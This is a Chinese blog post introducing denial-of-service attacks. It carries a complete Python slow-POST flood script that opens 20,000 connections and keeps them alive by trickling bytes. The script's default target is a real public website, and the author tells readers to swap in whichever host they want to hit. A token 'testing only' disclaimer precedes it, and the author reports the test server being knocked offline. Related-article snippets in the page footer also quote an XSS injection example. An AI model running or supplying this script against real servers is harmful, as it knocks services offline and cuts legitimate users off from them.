dos攻击原理及攻击实例(带脚本)

最新推荐文章于 2024-04-02 11:15:52 发布
最新推荐文章于 2024-04-02 11:15:52 发布
阅读量2.7w 收藏 140
点赞数 19
分类专栏: 网络供给与防御 文章标签: dos攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zsd747289639/article/details/53998974
版权

微笑首先声明,以下仅作为测试用,请勿作为非法用途。

dos攻击原理:DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。(百度百科说的,大概就是这么个意思)。

dos攻击与ddos攻击的区别就是,它是一对一的攻击,而ddos是分布式的攻击,作为入门,作为菜鸟,我们他妈哪里有那么多肉鸡给你用。。。所以不过对付一些带宽小,内存低,cpu渣的小型web服务器还是ok的。

现在,废话不多说,本地搭建一个web站点测试一下。

测试地址:http://192.168.1.110/cloudmanage/admin.php#(本地的)

测试脚本:网上一堆。给大家转载一个,如下:

#!/usr/bin/env python
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="www.baidu.com"
PAGE="/index.php"
#---------------------------
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
socks=[]
def conn_thread():
global socks
for i in range(0,MAX_CONN):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((HOST,PORT))
s.send(buf)
print "Send buf OK!,conn=%d\n"%i
socks.append(s)
except Exception,ex:
print "Could not connect to server or send error:%s"%ex
time.sleep(10)
#end def
def send_thread():
global socks
while True:
for s in socks:
try:
s.send("f")
#print "send OK!"
except Exception,ex:
print "Send Exception:%s\n"%ex
socks.remove(s)
s.close()
time.sleep(1)
#end def
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
conn_th.start()
send_th.start()
脚本来源是:http://blog.csdn.net/jeepxiaozi/article/details/8799684

以上是一个python脚本。

HOST="www.baidu.com"
PAGE="/index.php"

我们要改的是这两处地方

改为:

HOST=“192.168.1.110”//你要撸的主机ip地址/域名

PAGE=“/cloudmanage/admin.php”//你要撸的页面

cmd命令行下执行脚本

刷刷刷,一连串socket连接。。。就开着呗。我们来看看现在网页还可以访问不?

显然被日瘫了。

别搞事情!




zsd747289639
关注
  • 19
    点赞
  • 140
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
常用shell 脚本dos攻击防范,
05-26
常用shell脚本Dos攻击防范(自动屏蔽攻击IP).sh 一键部署等等 Linux系统发送告警脚本.sh MySQL数据库备份单循环.sh MySQL数据库备份多循环.sh nginx 访问访问日志按天切割.sh nginx.conf nginx访问日志分析脚本.sh shell.txt 一键查看服务器资源利用率.sh 一键部署LNMP网站平台脚本.sh 下载必看.txt 批量主机远程执行命令脚本.sh 批量创建100用户并设置密码脚本.sh 批量检测网站是否异常脚本.sh 找出占用CPU 内存过高的进程脚本.sh 更多精品教程.url 服务器系统配置初始化脚本.sh 本教程由我爱学it提供.url 查看网卡实时流量脚本.sh 监控100台服务器磁盘利用率脚本.sh 监控MySQL主从同步状态是否异常脚本.sh 目录文件变化监控和实时文件同步.sh 自动发布Java项目(Tomcat).sh 自动发布PHP项目脚本.sh
DoS攻击
后台开发
08-25 1万+
XSS攻击(Cross Site Scripting) 全称跨站脚本攻击 攻击者主要通过嵌入恶意脚本程序,当用户打开网页时,脚本程序便在客户端的浏览器中执行,以盗取客户端cookie,用户名密码,下载执行病毒木马程序等 <input type="text" name="nick" value=" "/><script>alert("你是煞笔")</script><!-" ">【value传值传入sricpt脚本】 防御手段: XSS之所以能...
crunch生成密码字典,hydra暴力破解正常win10用户,hping3进行dos攻击代码抓包演示及命令详解
最新发布
h1008685的博客
04-02 933
crunch生成密码字典,hydra暴力破解工具详解,实战对win10用户3384端口rdp服务进行暴力破解并进行远程连接,hping3工具dos攻击代码抓包演示及命令详解
reDOS攻击
csjjjd的博客
02-16 1595
当涉及到正则表达式的回溯时,让我们来看一个具体的例子。考虑以下正则表达式模式 ,其中 表示匹配一个或多个连续的字符 "a", 表示匹配字符 "b"。现在,假设有一个输入字符串为 "aaab",我们试图将这个字符串与模式进行匹配。以下是回溯的过程:引擎开始尝试匹配 ,它找到了第一个 "a"。然后引擎尝试匹配更多的 "a",发现了两个额外的 "a"。此时,引擎已经匹配了三个 "a",接下来它尝试匹配字符 "b"。因为输入字符串中的下一个字符是 "b",引擎成功地匹配了 "b",整个匹配成功。但是,如果我们考虑
信息安全应急演练记录
04-08
预览地址:https://wenku.baidu.com/view/4d01bbbf80c758f5f61fb7360b4c2e3f5627257b.html###
php编写dos攻击,php漏洞hash dos攻击实例及解决方法
weixin_39911475的博客
04-12 109
无意间在网上发现了一个php的漏洞的,看起来还真是的。。都学习下 执行这个php程序会使服务器cpu直接占用100%,如果循环,你懂的。下面是修补的方法: php-5.2.x: 到这里github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars下载对应的补丁版本,进入php目录,执行patch -p1 <...
典型的DOS攻击技术
weixin_42374938的博客
08-15 1580
Teardrop攻击又叫泪滴攻击也被称为分片攻击,它是一种典型的利用TCP/IP协议的问题进行拒绝服务攻击的方式,是基于UDP的病态分片数据包的攻击方法,其工作原理是向被攻击者发送多个分片的IP包,未来路能在到达目标主机后进行数据重组,IP包的TCP首部中包含有分片识别号、偏移量、数据长度、标志位的信息,说明了该分段是原数据的哪一段,这样,目标主机在收到数据后,就能根据首部中的信息将各分片重新组合还原为数据。假设采取IP欺骗的攻击主机为X,它的攻击目标是主机A,并且主机A信任主机B,那么。...
Dos与DDOS介绍及实例
whoim_i的博客
11-07 3448
目录一、拒绝服务攻击(Dos)1、拒绝服务攻击的分类1.滥用合理的服务请求2.制造大量无用数据3.利用传输协议缺陷4.利用服务程序的漏洞2、拒绝服务攻击原理3、常见拒绝服务攻击行为特征与防御方法1.死亡之 Ping(Ping of death)攻击2. SYN 洪水(SYN Flood)3.Land 攻击4.Smurf 攻击5.UDP 洪水(UDP Flood)6.IP 源地址欺骗 DOS 攻击...
真实案例:网站遭遇DOS攻击
李晨光原创IT博客
10-23 1643
 网站遭遇DOS攻击 一、事件背景 长假对于IT人员来说是个短暂的休整时期,可IT系统却一时也不能停,越是节假日,越可能出大问题,下面要讲述的就是一起遭受DOS攻击的案例。 春节长假刚过完,小李公司的Web服务器就出了故障。下午1点,吃完饭回来,小李习惯性的检查了Web服务器。Web服务器的流量监控系统显示下行的红色曲线,与此同时收到了邮件报警,可以判断服务器出现了状况。 根据...
DOS攻击程序
jimlee070128的专栏
09-18 1251
 /**//******************** DOS.c *****************/ #include #include #include #include #include #include #include #include #include void send_tcp(int sockfd,struct sockaddr_in *addr); unsigned shor
dos脚本示例1
Change
08-22 788
@echo off ::::::::::::: 1,先处理文本:::::::::: set conv_list=list.txt set indir=ui :: 切换到脚本所在目录 cd /d %~dp0 if "%1"=="" echo "usage: %0 替换列表文件 所在目录 [新替换文件] [输出目录]" & goto endrun if "%2"=="" echo "us
跨站脚本攻击实例解析
06-08
此文档是本人亲自整理过的相对通俗易懂的一个跨站脚本攻击实例解析
缓冲区溢出攻击原理实例
08-17
BufferOverflow缓冲区溢出攻击原理实例源代码,Visual C++6.0环境下调试通过
正交试验设计原理实例ppt课件
05-12
正交试验设计原理实例,正交试验设计原理实例课件,正交试验设计原理实例PPT
缓冲区溢出攻击原理+实例讲解
01-05
缓冲区溢出攻击原理+实例讲解
DOS攻击
yanglei818的博客
09-11 160
概念:DOS全称为Disk Operating System,意思是“磁盘操作系统”。DOS攻击通常是利用传输协议的漏洞、系统存在的漏洞、服务的漏洞,对目标系统发起大规模的进攻,用超出目标处理能力的海量数据包消耗可用系统资源、宽资源等,或造成程序缓冲区溢出错误,致使其无法处理合法用户的正常请求,无法提供正常服务,最终致使网络服务瘫痪,甚至引起系统死机。这是破坏攻击目标正常运行的一种“损人不利己”的攻击手段目录一、设置Vmnet 4网卡 网段为:192.168.2.0。
教你怎么成为黑客:DoS攻击类型入门指导与实例分析
ytt0523_com的博客
07-12 483
身为程序员,是不是有时候想象自己变成电影里的无敌黑客,仪表堂堂,喝着咖啡,敲一下回车键,就能入侵想入侵的地方?
安全术语扫盲
热门推荐
_南寻_的博客
02-09 1万+
行业术语扫盲 肉鸡 所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以像操作自己的电脑那样来操作它们,而不被对方发觉。 木马 木马就是表面上伪装成了正常的程序,但是当这些程序运行时,就会获取系统的整个控制权限。有很多黑客就是热衷于使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等 远控 远程控制,是在网络上由一台电脑(主控端Remote/客户端)远距
DoS/DDoS的现状分析和典型案例
sdpyly的博客
02-27 3720
随着网络技术日新月异的发展,网络空间安全需求已提上日程。网络攻击种类多样,手段层出不穷,严重威胁着经济社会平稳健康发展。常见的网络攻击有木马、病毒、蠕虫、注入攻击、DNS欺骗,ARP欺骗等,本文拟对拒绝服务攻击/分布式拒绝服务攻击展开介绍。
linux shell 命令行及脚本编程实例详解 豆瓣
09-06
《Linux Shell命令行及脚本编程实例详解》是一本介绍Linux Shell命令行和脚本编程的指南。书中详细介绍了Shell的基本概念和语法,以及许多实用的命令和实例。 首先,该书详细解释了Linux Shell的概念和分类,介绍了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值